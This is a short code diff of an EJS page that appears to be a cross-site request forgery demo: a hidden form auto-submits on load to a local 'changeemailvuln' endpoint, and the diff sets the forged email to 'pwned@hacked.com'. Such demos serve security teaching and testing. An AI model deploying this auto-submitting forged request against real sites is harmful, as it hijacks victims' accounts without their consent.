--- a/bezveze.ejs
+++ b/bezveze.ejs
@@ -2,7 +2,7 @@
 <html>
     <body>
         <form action="http://localhost:3000/changeemailvuln" method="POST">
-            <input type="hidden" name="email" id="email" value="paško_patak" />
+            <input type="hidden" name="email" id="email" value="pwned@hacked.com" />
         </form>
         <script>
            document.forms[0].submit();
